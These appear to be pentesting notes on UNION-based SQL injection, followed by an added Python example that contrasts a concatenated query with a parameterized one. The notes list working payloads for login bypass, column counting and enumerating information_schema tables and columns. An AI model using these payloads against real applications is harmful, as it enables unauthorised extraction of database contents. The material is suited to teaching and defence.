SQL & LFI
If you find a SQL injection vulnerability in an application, try UNION injection.
If the basic "admin'-- -" works, that means the query will look like:
SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'
so anything that is valid after the WHERE clause can be injected.
In the example below, we have ID, Name, Position, Phone No, and Email data.
Try admin' UNION SELECT NULL,NULL,... -- - and watch for any odd behavior (data breaking, byte changes) with Burp,
or try admin' ORDER BY 1, ORDER BY 2, and so on.
If it breaks, the query can only handle the last number that worked before the error, and that number is the column count.
Now we can extract useful data from the database!
Extract data from columns and tables:
UNION SELECT SCHEMA_NAME,2,3,4,5,6 FROM information_schema.schemata-- -
If you can't extract multiple values at once, try:
' UNION SELECT group_concat(SCHEMA_NAME),2,3,4,5,6 FROM information_schema.schemata-- -
What tables are in the user database?
group_concat(TABLE_NAME),2,3,4,5,6 FROM information_schema.tables where table_schema = "Staff"-- -
Once we know the table names, try to extract data from the columns:
group_concat(COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns where table_schema = "Staff"-- -
Displaying table and column names:
group_concat(TABLE_NAME,":",COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns where table_schema = "Staff" and table_name = "Users"-- -
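
Why the 'userinput' query above is injectable, and the fix, shown as an added example that is not part of the original notes: the same lookup built by string concatenation and with a bound parameter. It assumes an in-memory SQLite database with a constructed five-column users table; the function names and sample rows are hypothetical.

```python
import sqlite3

# Constructed inputs in the shape the notes use; the second has the wrong column count.
UNION_5 = "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -"
UNION_1 = "admin' UNION SELECT NULL-- -"

def make_db():
    # Constructed sample data: ID, Name, Position, Phone No, Email.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, first_name TEXT, "
               "position TEXT, phone TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "Manager", "555-0100", "admin@example.test"),
        (2, "bob", "Clerk", "555-0101", "bob@example.test"),
    ])
    return db

def lookup_vulnerable(db, name):
    # String concatenation: the input becomes part of the SQL text,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE first_name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, name):
    # Bound parameter: the driver passes the input as a value only,
    # so quotes, UNION and comment markers are compared as plain text.
    sql = "SELECT * FROM users WHERE first_name = ?"
    return db.execute(sql, (name,)).fetchall()

def outcome(fn, db, name):
    # Row count on success; the database error text otherwise. A
    # column-count error in application logs is a useful alert signal.
    try:
        return len(fn(db, name))
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)

if __name__ == "__main__":
    db = make_db()
    for label, value in (("plain", "admin"), ("union-5", UNION_5), ("union-1", UNION_1)):
        print(label, "| concatenated:", outcome(lookup_vulnerable, db, value),
              "| parameterized:", outcome(lookup_parameterized, db, value))
```

With the concatenated query the five-column UNION adds a row and the one-column UNION raises a database error; with the bound parameter both inputs simply match no user.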